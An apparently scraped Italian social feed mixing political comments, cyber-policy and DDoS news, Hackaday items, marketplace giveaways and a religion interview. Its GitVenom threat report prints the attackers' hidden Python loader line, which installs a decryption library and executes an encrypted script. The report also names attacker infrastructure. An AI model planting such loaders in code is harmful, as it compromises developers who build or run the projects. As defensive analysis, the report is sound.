Salta al contenuto principale



ma io vorrei capire una cosa... me lo ricordo solo io quando elon musk era una brava persona e mandava kit internet in ucraina gratis a sue spese? prima che passasse al lato oscuro della forza e cominciasse a definire zelensky mangiatore di cadaveri di soldati? ma cosa gli è successo? perché è impazzito?
in reply to simona

@simona mi sentirei di dire che facesse determinate cose più per calcolo che per convinzione. Come verosimilmente sta ancora facendo. Alla base probabilmente c'è anche un disturbo narcisistico della personalità.
Questa voce è stata modificata (6 mesi fa)




Cyber Command 2.0: Gli USA accelerano la guerra digitale contro Cina e Russia


Il Segretario alla Difesa degli Stati Uniti, Pete Hegseth, ha ordinato al Cyber ​​Command degli Stati Uniti (USCYBERCOM) di accelerare i preparativi per un importante sforzo di modernizzazione noto come “Cyber ​​Command 2.0”. Invece dei 180 giorni previsti per elaborare un piano per attuare la riforma, il comando ora dato solo 45 giorni, il che gli impone di presentare il documento finale entro e non oltre il 22 marzo. Questa inaspettata riduzione dei tempi rappresenta una sfida significativa per la dirigenza dell’USCYBERCOM, in quanto richiede di riconsiderare una serie di processi chiave in un lasso di tempo ridotto.

Motivi per accelerare la riforma


Il piano “Cyber ​​​​Command 2.0” era stato originariamente approvato alla fine dell’anno scorso dall’ex Segretario alla Difesa Lloyd Austin. Tuttavia, da quando è salita al potere la nuova amministrazione di Donald Trump, le priorità della politica informatica degli Stati Uniti sono cambiate in modo significativo. Il nuovo team della Casa Bianca sta spingendo per un’azione più decisa e aggressiva nel cyberspazio, soprattutto in seguito ai recenti attacchi e alle operazioni di spionaggio da parte della Cina.

Secondo fonti a conoscenza della situazione, Hegseth, dopo aver preso conoscenza della bozza il 5 febbraio, ha chiesto al comando non solo di accelerare lo sviluppo della riforma, ma anche di preparare un elenco di poteri necessari per migliorare l’efficacia delle operazioni. Inoltre, il Pentagono ha ordinato l’identificazione delle limitazioni normative che impediscono alle forze informatiche statunitensi di operare in modo più rapido ed efficace.

Cosa cambia allo US Cyber ​​Command?


Gli ambiti chiave della riforma erano:

  • Istituzione di un centro di innovazione per la guerra informatica che garantisca una stretta cooperazione tra l’esercito e le aziende tecnologiche private.
  • Sviluppo di un nuovo centro di eccellenza per la formazione informatica al fine di ampliare la formazione in tutto il sistema militare.
  • Introduzione di un nuovo modello per la formazione di unità informatiche in vari rami delle forze armate.
  • Sviluppare una strategia di gestione dei talenti che includa un sistema unificato di pagamenti, bonus e fidelizzazione dei dipendenti.

Queste misure sono progettate non solo per modernizzare il Cyber ​​Command, ma anche per creare un sistema di difesa informatica statunitense più flessibile e reattivo, in grado di adattarsi ai rapidi cambiamenti delle minacce.

Revisione dei poteri e nuove regole del gioco


Sebbene i dettagli esatti della riforma non siano ancora stati resi noti, la Commissione per i servizi armati della Camera sarebbe stata informata sul progetto e i senatori e i loro assistenti avrebbero ricevuto presentazioni preliminari. Nell’ambito della riforma, il Cyber ​​Command degli Stati Uniti sta anche sviluppando un’analisi delle potenziali nuove autorità che potrebbero essere necessarie per l’azione operativa.

Le fonti sottolineano che la richiesta di ampliare l’autorità del Cyber ​​Command non è nuova. Un processo simile si era già verificato nel 2017 sotto la prima amministrazione Trump. Sempre nel 2020 è stato condotto uno studio completo di tutti i comandi combattenti degli Stati Uniti, che ha portato all’ampliamento del Cyber ​​Command con l’inclusione di altri 14 comandi.

La sfida principale è la mancanza di tempo


Nonostante l’alto livello di sostegno alla riforma, alcuni esperti temono che scadenze così ravvicinate possano complicare il processo di coordinamento della modernizzazione tra i diversi rami delle forze armate.

Un funzionario ha affermato che i tempi sono troppo stretti perché i servizi militari e il Cyber ​​Command degli Stati Uniti raggiungano un accordo sulla condivisione delle risorse. Molto probabilmente il comando preparerà un piano, che verrà prima presentato al Pentagono e poi sottoposto all’approvazione dell’esercito.

Altri esperti ritengono che i principali disaccordi siano già noti e che il compito di Hegseth sia quello di contribuire a risolverli. In caso di questioni controverse, potrà proporre soluzioni specifiche e accelerare il processo di riforma.

“Coinvolgimento continuo” invece di transazioni una tantum


Un altro aspetto importante della riforma sarà il passaggio da operazioni informatiche una tantum a campagne strategiche a lungo termine. Questo concetto si basa sulla strategia Defend Forward, sancita per la prima volta nella dottrina informatica del Pentagono nel 2018. Si tratta di contrastare attivamente le minacce il più vicino possibile alla fonte, anziché limitarsi a proteggere i sistemi che sono già stati attaccati.

La nuova strategia privilegia l’impegno continuo con il nemico piuttosto che operazioni mirate occasionali. Ciò consentirà a Cyber ​​Command di gestire le risorse in modo più flessibile, rispondere più rapidamente alle minacce ed evitare lungaggini burocratiche.

In particolare, si sta discutendo sulla possibilità di semplificare la procedura di approvazione degli attacchi digitali, il che consentirà ai comandanti di prendere decisioni più rapidamente, anziché attendere un’approvazione in più fasi. Un approccio simile era già stato utilizzato nel 2018, quando l’amministrazione Trump aveva reso più facile lanciare attacchi informatici contro le campagne di disinformazione russe.

Prospettive per la riforma del “Cyber ​​​​Command 2.0”


Resta aperta la questione su quale sarà il documento finale che USCYBERCOM presenterà al Pentagono. Secondo gli esperti, con ogni probabilità includerà sia indicatori di performance specifici sia obiettivi flessibili a lungo termine che consentiranno al team di adattarsi alle nuove sfide.

Se implementato, il nuovo approccio cambierebbe in modo significativo il modo in cui opera il Cyber ​​Command degli Stati Uniti. Si creerà un sistema di guerra digitale efficace e autonomo, in grado non solo di rispondere agli attacchi, ma anche di prevenire attivamente le minacce in una fase iniziale.

Il cyberspazio sta sempre di più diventando la nuova arena di scontro globale e gli Stati Uniti cercano non solo di mantenere, ma anche di rafforzare il loro predominio in questo ambito.

L'articolo Cyber Command 2.0: Gli USA accelerano la guerra digitale contro Cina e Russia proviene da il blog della sicurezza informatica.



La strega malefica con il suo seguito, non smettono di fare i ridicoli...
ilfattoquotidiano.it/live-post…


#NotiziePerLaScuola
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.


The GitVenom campaign: cryptocurrency theft using GitHub


In our modern world, it’s difficult to underestimate the impact that open-source code has on software development. Over the years, the global community has managed to publish a tremendous number of projects with freely accessible code that can be viewed and enhanced by anyone on the planet. Very frequently, code published on the Internet serves as a source of inspiration for software developers – whenever they need to implement a project feature, they often check whether the code they need is already available online. This way, they avoid reinventing the wheel and thus save their precious time.

With more and more open-source projects being published, both state-sponsored actors and cybercriminals started using freely available code as a lure to infect their targets. Of course, this trend shows no sign of slowing down as evidenced by a currently active campaign aimed at GitHub users that we dubbed GitVenom.

Promise-filled yet fake projects


Over the course of the GitVenom campaign, the threat actors behind it have created hundreds of repositories on GitHub that contain fake projects with malicious code – for example, an automation instrument for interacting with Instagram accounts, a Telegram bot allowing to manage Bitcoin wallets, and a hacking tool for the video game Valorant.

Clearly, in designing these fake projects, the actors went to great lengths to make the repositories appear legitimate to potential targets. For instance, the malicious repositories we discovered contained well-designed README.md files, possibly generated using AI tools. We observed these files to contain information about the projects, as well as instructions on how to compile their code.

Snippets of README.md pages with descriptions of fake projects

Snippets of README.md pages with descriptions of fake projects

In addition to that, the attackers added multiple tags to their repositories, as well as artificially inflated the number of commits made to them. To do that, they placed a timestamp file in these repositories, which was updated every few minutes:

Example structure of a malicious repository
Example structure of a malicious repository

Malicious code implanted in many ways


While analyzing repositories created over the course of the GitVenom campaign, we noted that the fake projects we found were written in multiple programming languages – specifically Python, JavaScript, C, C++ and C#. As may be expected, these projects did not implement the features discussed in the README.md file, and their code mostly performed meaningless actions. At the same time, each of the projects was infected with malicious code, with its placement depending on the programming language used.

For instance, the attackers placed malicious code in Python-based projects by inserting a long line in one of the project files. This line consisted of about 2,000 tab characters, followed by the following code, responsible for decrypting and executing a Python script:
subprocess.run(['pip', 'install', 'cryptography'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL); subprocess.run(['pip', 'install', 'fernet'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL); from fernet import Fernet; import requests; exec(Fernet(b'<encrypted malicious Python script>'))
In the case of projects coded in JavaScript, the attackers created a malicious function inside them, which was in turn invoked from the main file of the project. Below is an example of such a function:

Example of a malicious function placed in JavaScript-based projects. It decodes a script from Base64 and executes it.
Example of a malicious function placed in JavaScript-based projects. It decodes a script from Base64 and executes it.

As for repositories containing C, C++ and C# code, the attackers decided to hide a malicious batch script inside Visual Studio project files, configuring it to execute at project build time:

Snippet from a malicious Visual Studio project file. It contains a PreBuildEvent attribute, which instructs the payload to execute at project build time.
Snippet from a malicious Visual Studio project file. It contains a PreBuildEvent attribute, which instructs the payload to execute at project build time.

Further payloads deployed


While coded in different programming languages, the malicious payloads stored inside the fake projects had the same goal – download further malicious components from an attacker-controlled GitHub repository (URL at the time of research:
hxxps://github[.]com/Dipo17/battle) and execute them. These components were as follows:

  • A Node.js stealer that collects information such as saved credentials, cryptocurrency wallet data and browsing history, packs it into a .7z archive and uploads it to the attackers via Telegram.

Structure of the archive which the stealer sends to the attackers
Structure of the archive which the stealer sends to the attackers


  • The open-source AsyncRAT implant (C2 server address: 68.81[.]155);
  • The open-source Quasar backdoor (C2 server address: same as above)
  • A clipboard hijacker, which searches the clipboard contents for cryptocurrency wallet addresses and replaces them with attacker-controlled ones. Notably, the attacker-controlled Bitcoin wallet (ID: bc1qtxlz2m6r[...]yspzt) received a lump sum of about 5 BTC (approximately 485,000 USD at the time of research) in November 2024.


Impact of the campaign


While investigating malicious repositories related to the GitVenom campaign, we found several fake projects published two years ago. Given that the attackers have been luring victims with these projects for several years, the infection vector is likely quite efficient. In fact, based on our telemetry, infection attempts related to GitVenom have been observed worldwide, with the highest number of them being in Russia, Brazil and Turkey. We expect these attempts to continue in the future, possibly with small changes in the TTPs.

Blindly running code from GitHub can be detrimental


As code-sharing platforms such as GitHub are used by millions of developers worldwide, threat actors will certainly continue using fake software as an infection lure. For that reason, it is crucial to handle processing of third-party code very carefully. Before attempting to run such code or integrate it into an existing project, it is paramount to thoroughly check what actions it performs. This way, it will be very easy to spot fake projects and prevent malicious code placed in them from being used to compromise the development environment.

Reference hashes for infected repository archives


63739e000601afde38570bfb9c8ba589 (06d0d13a4ce73775cf94a4a4f2314490de1d5b9af12db8ba9b01cd14222a2756)

3684907e595cd04bf30b27d21580a7c6 (bd44a831ecf463756e106668ac877c6b66a2c0b954d13d6f311800e75e9c6678)


securelist.com/gitvenom-campai…

Joe Vinegar reshared this.




davvero la scomparsa di #JimLeftwich lascia un vuoto, una ferita enorme che non si può curare né ignorare. le sue qualità umane incredibili, la sua attività artistica e poetica ... : mastodon.uno/@differx/11405826…


Nuovo Capitolo


Bright Monday. The tenants give us the keys back on Saturday morning and then leave. Ready to start over.


I nani europei


sinistrainrete.info/articoli-b…


L’Europa e la guerra per procura


sinistrainrete.info/articoli-b…


Unhacked Mattress Phones Home


[Dylan] has a fancy bed that can be set to any temperature. Apparently this set him back about $2,000, it only works if it has Internet, and the bed wants $19 a month for anything beyond basic features. Unsurprisingly, [Dylan] decided to try to hack the mattress firmware and share what he learned with us.

Oddly enough, it was easy to just ask the update URL for the firmware and download it. Inside, it turned out there was a mechanism for “eng@eightsleep.com” to remotely SSH into any bed and — well — do just about anything. You may wonder why anyone wants to gain control of your bed. But if you are on the network, this could be a perfect place to launch an attack on the network and beyond.

Of course, they can also figure out when you sleep, if you sleep alone or not, and, of course, when no one is in the bed. But if those things bother you, maybe don’t get an Internet-connected bed.

Oddly enough, the last time we saw a bed hack, it was from [Dillan], not [Dylan]. Just because you don’t want Big Sleep to know when you are in bed doesn’t mean it isn’t useful for your private purposes.


hackaday.com/2025/02/24/unhack…



Ottavo giorno di attacchi DDoS! NoName057(16) colpisce Regioni, Comuni e Città Italiane


Gli hacker di NoName057(16) continuano le loro attività ostili contro diversi obiettivi italiani, attraverso attacchi di Distributed Denial-of-Service (DDoS).

Questa volta a farne le spese sono le regioni italiane, i comuni e alcuni siti istituzionali delle città italiane. Al momento mentre scriviamo risulta offline il sito della Regione Lazio e il Comune di Taranto, mentre il sito del Comune di Roma risulta attivo.

NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Hanno rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei. Questi attacchi vengono in genere eseguiti su agenzie governative, media e siti Web di società private.

La Regione Lazio ha pubblicato poco fa una pagina che riporta che al momento il sito non risulta raggiungibile in quanto in manutenzione

Che cos’è un attacco Distributed Denial of Service


Un attacco DDoS (Distributed Denial of Service) è un tipo di attacco informatico in cui vengono inviate una grande quantità di richieste a un server o a un sito web da molte macchine diverse contemporaneamente, al fine di sovraccaricare le risorse del server e renderlo inaccessibile ai suoi utenti legittimi.

Queste richieste possono essere inviate da un grande numero di dispositivi infetti da malware e controllati da un’organizzazione criminale, da una rete di computer compromessi chiamata botnet, o da altre fonti di traffico non legittime. L’obiettivo di un attacco DDoS è spesso quello di interrompere le attività online di un’organizzazione o di un’azienda, o di costringerla a pagare un riscatto per ripristinare l’accesso ai propri servizi online.

Gli attacchi DDoS possono causare danni significativi alle attività online di un’organizzazione, inclusi tempi di inattività prolungati, perdita di dati e danni reputazionali. Per proteggersi da questi attacchi, le organizzazioni possono adottare misure di sicurezza come la limitazione del traffico di rete proveniente da fonti sospette, l’utilizzo di servizi di protezione contro gli attacchi DDoS o la progettazione di sistemi resistenti agli attacchi DDoS.

Occorre precisare che gli attacchi di tipo DDoS, seppur provocano un disservizio temporaneo ai sistemi, non hanno impatti sulla Riservatezza e Integrità dei dati, ma solo sulla loro disponibilità. pertanto una volta concluso l’attacco DDoS, il sito riprende a funzionare esattamente come prima.

Che cos’è l’hacktivismo cibernetico


L’hacktivismo cibernetico è un movimento che si serve delle tecniche di hacking informatico per promuovere un messaggio politico o sociale. Gli hacktivisti usano le loro abilità informatiche per svolgere azioni online come l’accesso non autorizzato a siti web o a reti informatiche, la diffusione di informazioni riservate o il blocco dei servizi online di una determinata organizzazione.

L’obiettivo dell’hacktivismo cibernetico è di sensibilizzare l’opinione pubblica su questioni importanti come la libertà di espressione, la privacy, la libertà di accesso all’informazione o la lotta contro la censura online. Gli hacktivisti possono appartenere a gruppi organizzati o agire individualmente, ma in entrambi i casi utilizzano le loro competenze informatiche per creare un impatto sociale e politico.

È importante sottolineare che l’hacktivismo cibernetico non deve essere confuso con il cybercrime, ovvero la pratica di utilizzare le tecniche di hacking per scopi illeciti come il furto di dati personali o finanziari. Mentre il cybercrime è illegale, l’hacktivismo cibernetico può essere considerato legittimo se mira a portare all’attenzione pubblica questioni importanti e a favorire il dibattito democratico. Tuttavia, le azioni degli hacktivisti possono avere conseguenze legali e gli hacktivisti possono essere perseguiti per le loro azioni.

Chi sono gli hacktivisti di NoName057(16)


NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Hanno rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei. Questi attacchi vengono in genere eseguiti su agenzie governative, media e siti Web di società private

Le informazioni sugli attacchi effettuati da NoName057(16) sono pubblicate nell’omonimo canale di messaggistica di Telegram. Secondo i media ucraini, il gruppo è anche coinvolto nell’invio di lettere di minaccia ai giornalisti ucraini. Gli hacker hanno guadagnato la loro popolarità durante una serie di massicci attacchi DDOS sui siti web lituani.

Le tecniche di attacco DDoS utilizzate dal gruppo sono miste, prediligendo la “Slow http attack”.

La tecnica del “Slow Http Attack”


L’attacco “Slow HTTP Attack” (l’articolo completo a questo link) è un tipo di attacco informatico che sfrutta una vulnerabilità dei server web. In questo tipo di attacco, l’attaccante invia molte richieste HTTP incomplete al server bersaglio, con lo scopo di tenere occupate le connessioni al server per un periodo prolungato e impedire l’accesso ai legittimi utenti del sito.

Nello specifico, l’attacco Slow HTTP sfrutta la modalità di funzionamento del protocollo HTTP, che prevede che una richiesta HTTP sia composta da tre parti: la richiesta, la risposta e il corpo del messaggio. L’attaccante invia molte richieste HTTP incomplete, in cui il corpo del messaggio viene inviato in modo molto lento o in modo incompleto, bloccando la connessione e impedendo al server di liberare le risorse necessarie per servire altre richieste.

Questo tipo di attacco è particolarmente difficile da rilevare e mitigare, poiché le richieste sembrano legittime, ma richiedono un tempo eccessivo per essere elaborate dal server. Gli attacchi Slow HTTP possono causare tempi di risposta molto lenti o tempi di inattività del server, rendendo impossibile l’accesso ai servizi online ospitati su quel sistema.

Per proteggersi da questi attacchi, le organizzazioni possono implementare soluzioni di sicurezza come l’uso di firewall applicativi (web application firewall o WAF), la limitazione delle connessioni al server e l’utilizzo di sistemi di rilevamento e mitigazione degli attacchi DDoS

L'articolo Ottavo giorno di attacchi DDoS! NoName057(16) colpisce Regioni, Comuni e Città Italiane proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



Un’illusione costata centinaia di migliaia di morti


infosannio.com/2025/02/23/come…


Does the 12VHPWR Connector Really Wear Out After 30 Mating Cycles?


When PCI-SIG introduced the 12VHPWR power connector as a replacement for the 6- and 8-pin PCIe power connectors, it created a wave of controversy. There were enough cases of melting GPUs, PSUs, and cables to set people on edge. Amidst this controversy, [JayzTwoCents] decided to do some scientific experimentation, Mythbusters-style, specifically: do these 12VHPWR (or the 12V-2×6 successor) wear out upon hitting the often cited 30 mating cycles? If this is the case, it could explain why people see wildly different current loads between the wires in their GPU power cables. Perhaps reviewers and hardware enthusiasts should replace their GPU power cables more often.

Like many Mythbuster experiments, the outcome is less than clear, as can be observed in the above graph from one data set. Even after 100 mating cycles, there was no observable change to the contact resistance. One caveat: this was only performed on the GPU side of the connector. The first cable tested was a newer connector type that uses a single-split leaf spring design. Initially, most of the 12VHPWR connectors had a double- or triple-dimple design to contact the pin, so [Jayz] tested one of these, too.

The amazing thing with the 2022-era cable that got pulled new out of packaging and tested was that it looked terrible under the microscope in terms of tolerances and provided a very uneven load, but it got better over time and also lasted 100 cycles. However, it must be said that ‘lasted’ is a big word here, as the retention tab wore off by this point, and the connector was ready to fall out with a light breeze.

Perhaps the ‘mating cycles’ specification is more about the connector as a whole, as well as how the connector is (ab)used, at which point good (long-term) contact is no longer assured. Along with the different types of Molex Mini- and Micro-Fit style connectors, it’s worth keeping an eye on with more applications than just GPUs.

We have certainly seen some burned connectors. Particularly in 3D printers.

youtube.com/embed/lAdLOf5of8Y?…


hackaday.com/2025/02/23/does-t…



Le donne palestinesi e i rischi meno noti delle lunghe attese ai posti di blocco israeliani


@Notizie dall'Italia e dal mondo
“I posti di blocco hanno affaticato la mia vescica”, dice una di loro. Non è una battuta, è uno dei tanti problemi quotidiani che soprattutto le donne devono affrontare di fronte alla chiusura delle città palestinesi da





in coscienza, a chi ha votato trump, e adesso è sconvolto, mi sento di riconoscere che era si chiaro che era un pessimo presidente, oltre a una pessima persona, specie alla luce del colpo di stato, ma devo anche riconoscere che non era facilmente immaginabile che potesse raggiungere un tale livello di distruttività generalizzata. questo mi sento in dovere di riconoscerlo.



Accadeva un anno fa. Centinaia di attivisti e sostenitori radunati davanti all' Alta Corte di Londra per chiedere la scarcerazione del giornalista Julian Assange. Ora Julian è libero ma finché non verrà graziato il giornalismo rimane sotto attacco.


Domenike Famelike


E' uscito il nuovo numero dedicato al limone. E' gratuito e puoi scaricarlo qui: pdfhost.io/v/LEULiHxCZ_LIMONED…


Kefir di latte - Questo è un post automatico da FediMercatino.it

Prezzo: Regalo $00

Dono grani di Kefir di latte (scoby per iniziare una propria produzione).

Roma, Zona Lepanto.

Se volete ricambiare in qualche modo poteste valutare una donazione al fedimercatino (al gruppo Devol, a Open for Future o/e ad Ufficio Zero Linux OS) e di diventare anche voi donatori di Kefir qui sul fedimercatino.

Price: 00 $00 :: Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️


Kefir di latte

Dono grani di Kefir di latte (scoby per iniziare una propria produzione).

Roma, Zona Lepanto.

Se volete ricambiare in qualche modo poteste valutare una donazione al fedimercatino (al gruppo Devol, a Open for Future o/e ad Ufficio Zero Linux OS) e di diventare anche voi donatori di Kefir qui sul fedimercatino.

Price: 00 $00 :: Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.




Kombucha - Questo è un post automatico da FediMercatino.it

Prezzo: Regalo $00

Dono Kombucha (scoby per iniziare una propria produzione).

Roma, Zona Lepanto.

Se volete ricambiare in qualche modo poteste valutare una donazione al fedimercatino (al gruppo Devol, a Open for Future o/e ad Ufficio Zero Linux OS) e di diventare anche voi donatori di Kefir qui sul fedimercatino.

Price: Regalo $00 :: Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️


Kombucha

Dono Kombucha (scoby per iniziare una propria produzione).

Roma, Zona Lepanto.

Se volete ricambiare in qualche modo poteste valutare una donazione al fedimercatino (al gruppo Devol, a Open for Future o/e ad Ufficio Zero Linux OS) e di diventare anche voi donatori di Kefir qui sul fedimercatino.

Price: Regalo $00 :: Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.




la cosa triste è che per certi versi ha pure ragione. è riuscito a destabilizzare l'intero continente europeo. ha rotto la nato. che valore ha adesso la nuova adesione della svezia e della finlandia? questo non interessa trump ma interessava putin. però la russia è devastata e isolata. non è stato a costo zero. e comunque l'ucraina è sempre li. e comunque questo dimostra chi sono i nazisti. quindi sommando tutto non saprei chi abbia vinto. e oltretutto in una guerra non vince mai nessuno per definizione alla fine. anche se l'umanità non pare essere in grado di produrre altro che distruzione. io comunqie continuo a chiedermi se quello che fa trump sia sostenibile alla lunga. quanto durerà. perché è vero che c'è nel mondo una immane quantità di teste di cazzo ma alla fine non tutti lo sono. davvero l'umanità è così tanto malata? difficile stabilire le proporzioni. gli analfabeti funzionali sono tantissimi ma hanno così influenza? putin ha il sostegno dei russi, ma trump fin a che punto può fidarsi dei cittadini usa e continuare a tirare la corda?



ma come è possibile che un pazzo del genere uscito da qualche manicomio possa avere un qualche ruolo dirigenziale. e il bello è che pure trump aveva sostenuto che i pazzi non dovevano avere incarichi delicati in occasione dello scontro fra aereo ed elicottero militare.... il problema è che questa gente parla solo perché ha la bocca. se le conseguenze di traumi infantili sono così gravi non dovrebbe essere comunque consentito a duna persona di nuocere così tanto. non sembra neppure una persona vera. è uscito da qualche fumetto distopico o una parodia. è pur vero che l'FBI non ha per definizione senso dell'umorismo, per sua stessa ammissione, ma fargliene una colpa a questo modo...

RFanciola reshared this.

in reply to simona

boh... veramente. forse sto ancora dormendo ed è un incubo. non so se possa essere reale tutto quello che sta uscendo dalla bocca di gente così in vista.
in reply to simona

Purtroppo lo è. E con i vari Musk&Trump in giro le cose non faranno che peggiorare. Basta vedere con che rapidità si moltiplicano i saluti nazisti.


2+2 fa circa 4, p < 0.05


Questa credo che sarebbe la conclusione della dimostrazione dell'ipotesi per cui 2+2 fa 4, se tale ipotesi fosse stata dimostrata tramite la #ricerca clinica. Ma cosa significa?
Significa che 2+2 fa 4 con una piccola variabilità, e che le probabilità che 4 sia il risultato dell'operazione per il solo effetto del caso sono molto, molto scarse. Scarse ma non nulle.
Questo accade perché in #medicina, in tutte le branche medico-scientifiche, e nella biologia in generale - tutte descritte come "scienze imperfette", le variabili in gioco sono talmente tante da non poter essere incluse tutte in una formula algebrica il cui risultato è matematicamente inoppugnabile.
Avete mai sentito un complottista obiettare che i numeri 3, 4 e 5 non rappresentino una terna (o triade? Perdonate l'ignoranza) pitagorica? O dire che l'area del rettangolo non è base per altezza? No. Perché esiste una certezza matematica che queste tesi siano vere, ed è impossibile dimostrare il contrario, nemmeno in una minima percentuale di casi.
Quel p < 0.05, invece, è il piccolo dettaglio che permette all'antintellettualismo di mettersi a tu per tu con gli scienziati. È la vostra parola contro quella di #ammiocuggino. Avete presente il nonno mancato a 98 anni di morte naturale fumando due pacchetti di sigarette al giorno? Ecco, si tratta di un confirmation #bias (cherry picking, nel linguaggio del web) talmente frequente, che i cimiteri italiani dovrebbero essere pieni di nonni highlander. Da molti, questa viene considerata la prova che il fumo non è poi così dannoso; per chi ha un minimo di intelligenza critica, invece, è solamente l'eccezione che conferma la regola.

Non entrerò nel dettaglio di come, in Italia, l'antintellettualismo e l'analfabetismo funzionale spianino la strada, anche da un punto di vista legislativo, alle pseudoscienze. Forse tratterò l'argomento nei prossimi tempi, e questo post potrebbe essere una buona introduzione. Per il momento, è solo un piccolo spunto di riflessione per intuire quanto rigore scientifico e quanto lavoro - spesso malretribuito - ci siano dietro ad un #trial clinico, e di quanto queste pratiche siano misconosciute ai più, creando situazioni equivoche in cui, potenzialmente, chiunque può tirare acqua al proprio mulino.






Netanyahu: Sospeso il rilascio dei prigionieri palestinesi


@Notizie dall'Italia e dal mondo
Dopo la liberazione dei sei ostaggi israeliani, Tel Aviv ha fatto sapere che non riconsegnerà i 602 prigionieri palestinesi che sono stati attesi ieri per tutto il giorno da famiglie e amici. Hamas ha dichiarato che si tratta di una "palese violazione" degli accordi e ha chiesto




Cristiani servi dell'imperatore - con Donald Trump si torna al IV secolo

(Intervista Vito Mancuso Giacomo Galeazzi per La stampa, mercoledì 12 febbraio 2025)

Vance richiama San Tommaso per giustificare la deportazione dei clandestini.«

La prima virtù cardinale è la saggezza, ovvero imparare a guardare e capire. Dobbiamo esercitare il discernimento. Magari potessimo dire che siamo di fronte a un finto cristianesimo. In realtà è uno dei possibili volti del cristianesimo e delle religioni. Anzi è il volto del cristianesimo che storicamente si è affermato di più. Nei secoli passati in tutti i Paesi occidentali vi erano cappellani militari che benedicevano le armi e arringavano i soldati contro i nemici dall'altra parte, spesso cattolici come loro, si pensi, per esempio, alle guerre tra italiani e austriaci. Lo Stato medievale era espressione della religione e viceversa. Antico e Nuovo testamento sono ricolmi di divisioni: noi i puri da una parte, loro gli impuri dall'altra. Ci siamo massacrati per secoli in nome di divinità contrapposte …

A cosa si riferisce?

Pensiamo al concetto ebraico di "herem" che ha motivato le efferatezze della guerra di conquista della cosiddetta Terrasanta. "Herem" letteralmente significa sterminio totale e contrassegna il passare a fil di spada, come dice la Bibbia, ogni essere vivente: uomini, donne, bambini, vecchi, animali. La sua istituzione è nel libro del Deuteronomio, capitolo settimo, cioè nella parte più sacra della Bibbia ebraica, la Torah. È sistematica l'applicazione di questo terribile comando quando Israele conquista le città nella terra di Canaan, tra cui Gerico. Chi vuole trovare motivazioni nella Bibbia per la propria guerra santa ha abbondante materiale per farlo.

L'esigenza di avere una società ordinata è un concetto estraneo al pensiero cristiano?

No. L'esigenza di ordine e si curezza è qualcosa di connaturato alla condizione umana e tutto ciò che è umano non può essere estraneo a un cristianesimo rettamente inteso. Se per favorire l'accoglienza in maniera unilaterale si mette a repentaglio l'ordine e la sicurezza si commette un errore politico, sociale e teologico. Il comandamento di amare il prossimo viene formulato dalla Bibbia e ripreso da Gesù dicendo di amare il prossimo "come se stessi". Non si tratta di amare il prossimo più di se stessi, ma come se stessi. L'esigenza di accoglienza dei migranti non può essere a scapito delle esigenze di sicurezza dei residenti. Non è uno sbilanciamento nell'esercizio dell'amore verso alcune categorie di persone a scapito di altre. D'altro lato neppure l'esigenza di sicurezza può essere a scapito della doverosa e umana accoglienza dei bisognosi. Proteggere i propri cittadini e accogliere gli stranieri bisognosi devono esserei due pilastri da unire per formare il ponte della vera politica di ispirazione cristiana, sempre che non si voglia usare in modo pretestuoso e falso il richiamo al cristianesimo. Una sana politica che si definisce cristiana deve porsi l'obiettivo di comporre queste due polarità.

E Trump fotografato come Gesú nell'Ultima cena?

È una foto epocale, mi ha suscitato un'impressione cosi profonda che l'ho salvata sul computer. Segna un cambiamento di paradigma a livello religioso e politico. Il clero, incluso un sacerdote cattolico, fa da corte all'imperatore! È uno scatto sconvolgente che ci riprecipita al quarto secolo, all'epoca dell'imperatore Costantino e re Teodosio, i quali vollero e convocarono i primi concili ecumenici, a partire dal primo, quello di Nicea voluto da Costantino nel 325, esattamente 1700 anni fa, e poi quello di Costantinopoli voluto da Teodosio nel 381. L'anno prima Teodosio con l'Editto di Tessalonica aveva proclamato il cristianesimo religione di Stato. E da allora il legame tra potere politico e potere religioso è stato organico e continuativo, ha rappresentato il vero e proprio collante della società cristiana, pur con qualche frizione come la lotta per le investiture nei secoli medievali.
Ma poi è arrivato il Vaticano II, e il Concilio prese atto che il legame organico tra potere politico e potere religioso in Occidente si andava dissolvendo e che occorreva ricostruire il rapporto su nuove basi. Nell'Occidente cattolico e protestante, a differenza dell'Oriente ortodosso, all'inizio degli Anni Sessanta si pensava di essere usciti dalle epoche del collaborazionismo trono-altare e dei conseguenti concordati con il regime fascista (1929) e con il regime nazista (1933). Spero di sbagliarmi, ma con Trump e con Vance sembra che possiamo ritornare lì. La foto stile "Ultima cena" con Trump al posto di Gesù che abbiamo ricordato lo dimostra. Ora in Vaticano c'è Papa Francesco che si oppone strenuamente a questa visione, ma dopo di lui chissà. Una cosa è sicura pur essendo qualcosa che la storia della Chiesa e della teologia conosce bene, questa riduzione del cristianesimo a instrumentum regni è quanto di più anticristiano possa esserci.

Perché anticristiano?

